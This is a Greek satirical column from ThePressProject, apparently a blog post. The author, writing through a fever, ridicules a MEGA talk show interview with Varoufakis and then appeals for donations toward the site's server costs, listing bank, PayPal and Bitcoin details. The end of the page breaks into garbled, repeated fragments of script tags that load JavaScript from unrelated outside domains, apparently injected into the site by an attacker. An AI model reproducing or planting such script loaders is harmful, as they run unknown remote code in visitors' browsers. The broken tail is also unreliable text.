Διάβασέ το αυτό προσεκτικά… Κώστας Εφήμερος

Είμαι φορέας της κακιάς ίωσης που κυκλοφορεί αυτές τις μέρες και έτσι υπό υψηλές θερμοκρασίες παρακολουθώ παραμορφωμένη την καθημερινότητα (λένε ότι αναλόγως την βιώνουν και οι νορμάλ άνθρωποι). Πρέπει να είχα ξεπεράσει τους 39 βαθμούς και να έπαιζα με τα δέκατα όταν το βράδυ της Τετάρτης είδα το νέο talk show του MEGA με την Όλγα Τρέμη και τον Νίκο Ευαγγελάτο.

Η Όλγα Τρέμη φορώντας την καινούρια της εμπριμέ κουρτίνα και ο Νίκος Ευγαγγελάτος με το κασκέτο φτιαγμένο από ζελέ παρουσίαζαν μια νέα εκπομπή βασισμένη στα φρέσκα μυαλά τους, με πρωτότυπες ερωτήσεις και φυσικά με καλεσμένο έκπληξη… όπως είπε η Όλγα (το είπε αλήθεια, το τσέκαρα και με απύρετους) το Γιάνη Βαρουφάκη που θα μιλούσε μπροστά στην κάμερα μετά από αρκετές ημέρες σιωπής (!)… ο Γιάνης… που δεν κατάφερε να κρατήσει την αναπνοή του ούτε στις Βρυξέλλες που μας το είχε υποσχεθεί.

Το βλέμμα μου είχε καρφωθεί στο σκηνικό. Σε μια αχανή έκταση ο σκηνογράφος είχε παίξει με όλα τα υλικά: μέταλλο, γυαλί, ξύλο, πολίτες και ένα video wall από το οποίο εμφανιζόταν ο Γιάνης, γιατί οι επαγγελματικές του υποχρεώσεις τον είχαν καθηλώσει στο Παρίσι. Τώρα βέβαια εμένα που η θερμοκρασία μου κόντευε να ξεπεράσει την ηλικία μου φαινόταν ότι ήδη υπήρχε κάποια εμπύρετη παρεξήγηση και ότι το πιθανότερο θα ήταν ο Γιάνης να είχε μείνει στην Αθήνα για την συνέντευξη και να έβλεπε τον Γκούρια από video wall. Το σωστό θα ήταν να είχαν πάει το στούντιο στο Παρίσι…

Τι τα θες όμως, ο υπουργός ήταν στη Γαλλία και η Όλγα είχε βάλει αυτό το φοβερό φόρεμα που ήταν ολόιδιο με το χαλάκι με ζωγραφιές που έχουμε πάρει στο δίχρονο γιό μου οπότε δεν γινόταν να αλλάξει το MEGA τον προγραμματισμό του. Είχε δώσει μια υπόσχεση στους τηλεθεατές της. Ο Ευαγγελάτος είχε προετοιμάσει τις ερωτήσεις του και θα εξηγούσε τα πάντα γύρω από το μυστήριο της Ευρωζώνης, όπως τότε που είχε ξετινάξει την υπόθεση με τον κετσέ. Εντάξει, μπορεί το δορυφορικό αμφίδρομο κύκλωμα επί 2 ώρες να στοιχίζει όσο η μισθοδοσία του ThePressProject για 3,5 μήνες αλλά εδώ μιλάμε για το ΜΕΓΑΛΟ ΚΑΝΑΛΙ, για το συνδετικό κρίκο της ολιγαρχίας στην Ελλάδα. Για το σημείο που ο Μπόμπολας, ο Ψυχάρης και ο Βαρδινογιάννης… τώρα εδώ κανονικά ό,τι και να συμπληρώσεις σε μια πρόταση που ξεκινάει έτσι είναι σίγουρα μηνύσιμο. Ψήνομαι κιόλας…

Τέλος πάντων γιατί τα γράφω όλα αυτά; Φυσικά από ζήλια. Γιατί μπορεί ο πυρετός μου να έχει σκαλώσει και να μην μπορεί να ξεπεράσει τα 40 με τίποτα αλλά αυτό δεν συμβαίνει και με τις υποχρεώσεις του TPP.

Έπρεπε ήδη από εχθές να έχουμε καλύψει το κόστος των server, αυτά είναι 675€. Έχουμε όμως λιγότερο από 300€ στο αποθεματικό μας. Η εταιρία πληροφορικής που μας στηρίζει έχει να εισπράξει οτιδήποτε πριν τις εκλογές. Μόνο εσείς μπορείτε τώρα να μας στηρίξετε, τουλάχιστον δηλαδή για περίπου 20 ημέρες, οπότε περιμένουμε μια εξόφληση.

Άκου τώρα να σου πω: Εγώ είμαι με υψηλό πυρετό και εσύ μπορεί να μην έχεις να δώσεις ούτε μισό ευρώ. Σε αυτή την περίπτωση όμως μπορείς να κάνεις ένα share, να το στείλεις με ένα mail σε ένα φίλο σου που ίσως θα μπορούσε, να το πεις στη παρέα σου το βράδυ (που σιγά μην έχεις χρήματα για να βγεις και το βράδυ, αλλά λέμε τώρα).

Ελάτε παιδιά να καλύψουμε για λίγες ημέρες αυτή την τρύπα, όχι μόνο για να συνεχίσουν οι servers να τρέχουν τον όμορφο κώδικά μας, αλλά για να πάρουν έναντι και κάποιοι άνθρωποι που βάζουν πλάτη στα δύσκολα.

Το TPP είναι ένα μεγάλο ΜΜΕ πια με πολλές εκατοντάδες χιλιάδες καθημερινούς αναγνώστες. Το μόνο που χρειάζεται είναι να ξαναθυμηθούμε τον παλιό καλό καιρό που έδινες μερικές δραχμές (δεν φταίω εγώ, δραχμές έδινες τότε) για να αγοράσεις την ενημέρωση. Να φοβάστε αυτούς που την παρέχουν δωρεάν γιατί δεν την παρέχουν τσάμπα.

Ενισχύεις το TPP, ενισχύεις την ενημέρωση, ενισχύεις την δημοκρατία

(είπαμε ο πυρετός είναι περίεργο πράγμα).

Υ.Γ.Πώς να ενισχύσετε…

Τραπεζικός λογαριασμός:
ΤΡΑΠΕΖΑ ΠΕΙΡΑΙΩΣ
5078-024834-775 (Δικαιούχος: Π.Κ.)
IBAN: GR48 0172 0780 0050 7802 4834 775
BIC: PIRBGRAA

PayPal

 

Διαφήμιση
Αν δεν είσαι τράπεζα η κρατικός φορέας μπορείς να διαφημιστείς στις σελίδες του ThePressProject. Επικοινώνησε στο 210.52.29.567

Bitcoins

Το ThePressProject δέχεται Bitcoins στη διεύθυνση:
18ZJ4QJU5rU6HRYjqvDTiiphLqc9B1Z2Ee
Μπορείτε να χρησιμοποιήσετε το QR:

PaySafe

Το PaySafe κρατάει προμήθεια 30%. Τη θεωρούμε υπερβολική και γι’ αυτό δεν χρησιμοποιούμε την υπηρεσία αυτή.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >